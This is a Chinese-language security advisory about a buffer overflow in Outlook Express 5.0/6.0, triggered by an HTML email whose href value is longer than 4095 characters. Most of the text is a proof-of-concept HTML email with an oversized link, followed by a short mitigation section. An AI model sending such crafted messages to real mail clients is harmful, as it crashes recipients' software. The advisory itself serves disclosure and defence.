Outlook Express HTML 邮件超长字节href值缓冲溢出缺陷

※黑客攻防指南※==>系统漏洞=>Outlook Express HTML 邮件超长字节href值缓冲溢出缺陷
Outlook Express HTML 邮件超长字节href值缓冲溢出缺陷
Outlook Express HTML 邮件超长字节href值缓冲溢出缺陷 (MS,缺陷) 

涉及程序： 
Microsoft Outlook Express 5.0 /6.0 

描述： 
Outlook Express HTML 邮件超长字节href值缓冲溢出缺陷 

详细： 
Microsoft Outlook Express 5.0 /6.0 被发现存在一个缓冲溢出缺陷，即使安装了SP1及SP2也是如此。

由于设计上的原因 Outlook Express 在解析HTML邮件时，如果其邮件代码的 href 值超过4095个字符时，Outlook Express 就会发生缓冲溢出而崩溃。

在Windows 98/ME/2000平台上测试过，均存在此缺陷。不过在有的系统上不存在这个问题，可能是由于某些默认配置错误引起的，不过只是估计而以。


攻击方法： 
"Raistlin" <raistlin@gioco.net>提供了如下测试方法：

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META content="text/html; charset=iso-8859-1" http-equiv=Content-Type>
<META content="MSHTML 5.00.3314.2100" name=GENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY>
<DIV><a href="12345678901234567890123456789012345678901234567890123456789012345678901234567890
1234567890123456789C12345678901234567890123456789012345678901234567890123456789012345678901234
5678901234567890123456789C12345678901234567890123456789012345678901234567890123456789012345678
9012345678901234567890123456789C12345678901234567890123456789012345678901234567890123456789012
3456789012345678901234567890123456789C12345678901234567890123456789012345678901234567890123456
7890123456789012345678901234567890123456789D12345678901234567890123456789012345678901234567890
1234567890123456789012345678901234567890123456789C12345678901234567890123456789012345678901234
5678901234567890123456789012345678901234567890123456789C12345678901234567890123456789012345678
9012345678901234567890123456789012345678901234567890123456789C12345678901234567890123456789012
3456789012345678901234567890123456789012345678901234567890123456789C12345678901234567890123456
7890123456789012345678901234567890123456789012345678901234567890123456789M12345678901234567890
1234567890123456789012345678901234567890123456789C12345678901234567890123456789012345678901234
5678901234567890123456789012345678901234567890123456789C12345678901234567890123456789012345678
9012345678901234567890123456789012345678901234567890123456789C12345678901234567890123456789012
3456789012345678901234567890123456789012345678901234567890123456789C12345678901234567890123456
7890123456789012345678901234567890123456789012345678901234567890123456789M12345678901234567890
1234567890123456789012345678901234567890123456789C12345678901234567890123456789012345678901234
5678901234567890123456789012345678901234567890123456789C12345678901234567890123456789012345678
9012345678901234567890123456789012345678901234567890123456789C12345678901234567890123456789012
3456789012345678901234567890123456789012345678901234567890123456789C12345678901234567890123456
7890123456789012345678901234567890123456789012345678901234567890123456789M12345678901234567890
1234567890123456789012345678901234567890123456789C12345678901234567890123456789012345678901234
5678901234567890123456789012345678901234567890123456789C12345678901234567890123456789012345678
9012345678901234567890123456789012345678901234567890123456789C12345678901234567890123456789012
3456789012345678901234567890123456789012345678901234567890123456789C12345678901234567890123456
7890123456789012345678901234567890123456789012345678901234567890123456789M12345678901234567890
1234567890123456789012345678901234567890123456789C12345678901234567890123456789012345678901234
5678901234567890123456789012345678901234567890123456789C12345678901234567890123456789012345678
9012345678901234567890123456789012345678901234567890123456789C12345678901234567890123456789012
3456789012345678901234567890123456789012345678901234567890123456789C12345678901234567890123456
7890123456789012345678901234567890123456789012345678901234567890123456789M12345678901234567890
1234567890123456789012345678901234567890123456789C12345678901234567890123456789012345678901234
5678901234567890123456789012345678901234567890123456789C12345678901234567890123456789012345678
9012345678901234567890123456789012345678901234567890123456789C12345678901234567890123456789012
3456789012345678901234567890123456789012345678901234567890123456789C12345678901234567890123456
7890123456789012345678901234567890123456789012345678901234567890123456789M12345678901234567890
1234567890123456789012345678901234567890123456789C12345678901234567890123456789012345678901234
5678901234567890123456789012345678901234567890123456789C12345678901234567890123456789012345678
9012345678901234567890123456789012345678901234567890123456789C12345678901234567890123456789012
3456789012345678901234567890123456789012345678901234567890123456789C12345678901234567890123456
7890123456789012345678901234567890123456789012345678901234567890123456789M12345678901234567890
1234567890123456789012345678901234567890123456789C12345678901234567890123456789012345678901234
5678901234567890123456789012345678901234567890123456789C12345678901234567890123456789012345678
9012345678901234567890123456789012345678901234567890123456789C12345678901234567890123456789012
3456789012345678901234567890123456789012345678901234567890123456789C12345678901234567890123456
7890123456789012345678901234567890123456789012345678901234567890123456789M12345678901234567890
1234567890123456789012345678901234567890123456789C12345678901234567890123456789012345678901234
5678901234567890123456789012345678901234567890123456789C12345678901234567890123456789012345678
9012345678901234567890123456789012345678901234567890123456789C12345678901234567890123456789012
3456789012345678901234567890123456789012345678901234567890123456789C12345678901234567890123456
7890123456789012345678901234567890123456789012345678901234567890123456789M12345678901234567890
1234567890123456789012345678901234567890123456789C12345678901234567890123456789012345678901234
5678901234567890123456789012345678901234567890123456789C12345678901234567890123456789012345678
9012345678901234567890123456789012345678901234567890123456789C12345678901234567890123456789012
3456789012345678901234567890123456789012345678901234567890123456789C12345678901234567890123456
7890123456789012345678901234567890123456789012345678901234567890123456789M12345678901234567890
1234567890123456789012345678901234567890123456789C12345678901234567890123456789012345678901234
5678901234567890123456789012345678901234567890123456789C12345678901234567890123456789012345678
9012345678901234567890123456789012345678901234567890123456789C12345678901234567890123456789012
3456789012345678901234567890123456789012345678901234567890123456789C12345678901234567890123456
7890123456789012345678901234567890123456789012345678901234567890123456789M12345678901234567890
1234567890123456789012345678901234567890123456789C12345678901234567890123456789012345678901234
5678901234567890123456789012345678901234567890123456789C12345678901234567890123456789012345678
9012345678901234567890123456789012345678901234567890123456789C12345678901234567890123456789012
3456789012345678901234567890123456789012345678901234567890123456789C12345678901234567890123456
7890123456789012345678901234567890123456789012345678901234567890123456789M12345678901234567890
1234567890123456789012345678901234567890123456789C12345678901234567890123456789012345678901234
5678901234567890123456789012345678901234567890123456789C12345678901234567890123456789012345678
9012345678901234567890123456789012345678901234567890123456789C12345678901234567890123456789012
3456789012345678901234567890123456789012345678901234567890123456789C12345678901234567890123456
7890123456789012345678901234567890123456789012345678901234567890123456789M12345678901234567890
5678901234567890123456"> test </a>
</DIV></BODY></HTML>



解决方案： 
目前厂商还没有提供补丁或者升级程序，建议用户随时关注厂商的站点以获取最新版本：

http://www.microsoft.com/technet/security/

临时解决方案：

* 过滤所有HTML邮件进行相关过滤